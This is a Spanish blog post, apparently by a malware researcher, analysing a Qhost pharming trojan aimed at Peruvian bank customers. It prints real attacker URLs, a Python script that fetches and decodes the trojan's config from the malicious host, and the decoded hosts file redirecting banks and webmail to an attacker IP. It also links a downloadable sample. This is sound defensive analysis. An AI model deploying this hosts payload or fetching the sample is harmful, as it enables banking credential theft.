Este troyano utiliza técnicas de cifrado del archivo de configuración del pharming para evitar la mirada de curiosos y despistar a los investigadores. Es igual al siguiente caso, el cual analizamos con Cryptool.
Falso Correo enviado por los defraudadores.
hxxxxtp://mcvalez.mcdonalds.pe.noticieroz.info/vale/sorteo/comida/SkdlcnJpZTE5OTFAaG90bWFpbC5jb20=
El link esta codificado en Base64 y tiene relación con el email de la victima.
Descarga
Nos descarga un .ZIP con un .SCR en el interior.
Icono del malware.
El ejecutable .SCR es un utilitario que descomprime otro zip que en su interior tiene el malware programado en VBasic
Extraemos el .Zip a mano recortando con el editor FlexHex.
Icono del malware.
Luego lo cargamos en el Olly para estudiar su comportamiento.
Strings interesantes:
0040445C ASCII "URL",0
004044A9 PUSH winlogon.00402844 UNICODE "/bmuht/segami/ofni.retsboon//:ptth"
00404A53 MOV EDX,winlogon.00402890 UNICODE "live"
004064FD PUSH winlogon.004028E4 UNICODE "=yrtnuoc"
004065A0 MOV DWORD PTR SS:[EBP-74],winlogon.00402 UNICODE " host"
00406797 PUSH winlogon.00402924 UNICODE "Revisar"
00406D6B PUSH winlogon.00402960 UNICODE "stsoh\cte\srevird\23metsys\"
004071B2 PUSH winlogon.00402A30 UNICODE "php.atad/moc.lootpioeg//:ptth"
00407220 PUSH winlogon.00402A70 UNICODE "/2"
0040724B PUSH winlogon.00402A7C UNICODE "gpj."
004074AF PUSH winlogon.00402B48 UNICODE ""
0040754B PUSH winlogon.00402B48 UNICODE ""
00408855 PUSH winlogon.00402E88 UNICODE "RegWrite"
00408E8E MOV DWORD PTR SS:[EBP-98],winlogon.00402 UNICODE "00000000"
00408FBE MOV ESI,winlogon.00402F0C UNICODE "0000"
004091E7 PUSH winlogon.00402F24 UNICODE "ets"
Utilización de la función StrReverse para
004044A9 PUSH winlogon.00402844 UNICODE "/bmuht/segami/ofni.retsboon//:ptth"
http://noobster.info/images/thumb/ (HOST DEL PHARMING)
0040724B PUSH winlogon.00402A7C UNICODE "gpj."
.jpg
00406D6B PUSH winlogon.00402960 UNICODE "stsoh\cte\srevird\23metsys\"
system32/drivers/etc/hosts
004071B2 PUSH winlogon.00402A30 UNICODE "php.atad/moc.lootpioeg//:ptth"
http://geoiptool.com/data.php
004064FD PUSH winlogon.004028E4 UNICODE "=yrtnuoc"
country=
Del sitio de goiptool.com verifica de que pais se esta accediendo y dependiendo de esto arma la URL para descargar el Pharming
Así arma el URL para buscar la configuración del Pharming:
host del pharming /+ country +/ data en hexa /+ .jpg
Verificando, este Qhost afecta a Perú
http://noobster.info/images/thumb/Peru/2BC5F61EB.jpg
En caso de fallar la Geoip en country pone el string Revisar
00406797 PUSH winlogon.00402924 UNICODE "Revisar"
Vemos como la configuración esta codificada.
Como vimos en otra ocasión esta codificado con suma de bytes con una Key 07
Aquí un decente Script en Python para decodificar el archivo de configuración del troyano.
---------------------------------------------------------Python Script----------------------------------------------
import sys
from urllib import FancyURLopener
from random import choice
import string
url ='http://noobster.info/images/thumb/Peru/2BC5F61EB.jpg';
ca = ''
salida = '';
user_agents = [
'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11',
# 'Opera/9.25 (Windows NT 5.1; U; en)'
# 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.162 Safari/535.19'
# 'Mozilla/5.0 (Windows; U; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)'
]
def sumab(string):
data = []
for k in xrange(len(string)):
se = ord(string[k])
xx = (se - 07)
data += [chr(xx)]
return data
class MyOpener(FancyURLopener, object):
version = choice(user_agents)
myopener = MyOpener()
source = myopener.open(url)
cadena = source.read()
salida = sumab(cadena);
for imprime in range(len(salida)):
ca = ca + salida[imprime]
print ca
---------------------------------------------------------Python Script----------------------------------------------
Tomado la config http://noobster.info/images/thumb/Peru/2BC5F61EB.jpg
Obtenemos como Resultado:
# Éste es un ejemplo de archivo HOSTS usado por Microsoft TCP/IP para Windows.
#
# Este archivo contiene las asignaciones de las direcciones IP a los nombres de
# host. Cada entrada debe permanecer en una línea individual. La dirección IP
# debe ponerse en la primera columna, seguida del nombre de host correspondiente.
# La dirección IP y el nombre de host deben separarse con al menos un espacio.
#
#
# También pueden insertarse comentarios (como éste) en líneas individuales
# o a continuación del nombre de equipo indicándolos con el símbolo #
#
# Por ejemplo:
#
# 102.54.94.97 rhino.acme.com # servidor origen
# 38.25.63.10 x.acme.com # host cliente x
127.0.0.1 localhost
199.59.58.37 viabcp.com
199.59.58.37 www.viabcp.com
199.59.58.37 zonasegura.viabcp.com
199.59.58.37 telecreditonp.bcp.com.pe
199.59.58.37 telecredito.bcp.com.pe
199.59.58.37 peb1.bbvanetlatam.com
199.59.58.37 bancofalabella.pe
199.59.58.37 www.bancofalabella.pe
199.59.58.37 interbank.com.pe
199.59.58.37 www.interbank.com.pe
199.59.58.37 netinterbank.com.pe
199.59.58.37 scotiabank.com.pe
199.59.58.37 www.scotiabank.com.pe
199.59.58.37 scotiaenlinea.scotiabank.com.pe
199.59.58.37 wiese.com.pe
199.59.58.37 www.wiese.com.pe
199.59.58.37 scotiaenlinea.wiese.com.pe
199.59.58.37 bws.com.pe
199.59.58.37 www.bws.com.pe
199.59.58.37 scotiaenlinea.bws.com.pe
199.59.58.37 bn.com.pe
199.59.58.37 www.bn.com.pe
199.59.58.37 zonasegura1.bn.com.pe
199.59.58.37 correoweb.terra.com.pe
199.59.58.37 correo.speedy.com.pe
199.59.58.37 gmail.com
199.59.58.37 www.gmail.com
199.59.58.37 mail.gmail.com
199.59.58.37 g.msn.com
199.59.58.37 www.g.msn.com
199.59.58.37 hotmail.com
199.59.58.37 www.hotmail.com
199.59.58.37 lives.com
199.59.58.37 login.lives.com
199.59.58.37 outlook.com
199.59.58.37 www.outlook.com
199.59.58.37 livez.com
199.59.58.37 login.livez.com
Por lo que les recomiendo a las entidades financieras y otros afectados pedir la baja del servicio:
http://noobster.info/
Domain ID:D47799647-LRMS
Domain Name:NOOBSTER.INFOCreated On:17-Sep-2012 08:24:10 UTC
Last Updated On:16-Nov-2012 20:30:52 UTC
Expiration Date:17-Sep-2013 08:24:10 UTC
Sponsoring Registrar:eNom, Inc. (R126-LRMS)
Status:CLIENT TRANSFER PROHIBITED
Registrant ID:563bb08ef02c9a8b
Registrant Name:WhoisGuard Protected
Registrant Organization:WhoisGuard
Registrant Street1:11400 W. Olympic Blvd. Suite 200
Registrant Street2:
Registrant Street3:
Registrant City:Los Angeles
Registrant State/Province:CA
Registrant Postal Code:90064
Registrant Country:US
Registrant Phone:
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:
Admin ID:df2d1c638ea5af3a
Admin Name:WhoisGuard Protected
Admin Organization:WhoisGuard
Admin Street1:11400 W. Olympic Blvd. Suite 200
Admin Street2:
Admin Street3:
Admin City:Los Angeles
Admin State/Province:CA
Admin Postal Code:90064
Admin Country:US
Admin Phone:
Admin Phone Ext.:
Admin FAX:
Admin FAX Ext.:
Admin Email:
Billing ID:563bb08ef02c9a8b
Billing Name:WhoisGuard Protected
Billing Organization:WhoisGuard
Billing Street1:11400 W. Olympic Blvd. Suite 200
Billing Street2:
Billing Street3:
Billing City:Los Angeles
Billing State/Province:CA
Billing Postal Code:90064
Billing Country:US
Billing Phone:
Billing Phone Ext.:
Billing FAX:
Billing FAX Ext.:
Billing Email:
Tech ID:9614858ef02c9a8b
Tech Name:WhoisGuard Protected
Tech Organization:WhoisGuard
Tech Street1:11400 W. Olympic Blvd. Suite 200
Tech Street2:
Tech Street3:
Tech City:Los Angeles
Tech State/Province:CA
Tech Postal Code:90064
Tech Country:US
Tech Phone:
Tech Phone Ext.:
Tech FAX:
Tech FAX Ext.:
Tech Email:
Name Server:NS1.V7HOST.COM
Name Server:NS2.V7HOST.COM
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Muestra: http://dl.dropbox.com/u/80008916/Qhost%2008-02-03.rar
password = infected
Eso es todo por el momento.
@DkAvalanche 2013
PD: Este es mi post Nro:
1 comentario:
Si, la semana pasada mandaron varios mails con distintos tipos de phishings, me alegro Moc que te sirva!
Abrazo!
Publicar un comentario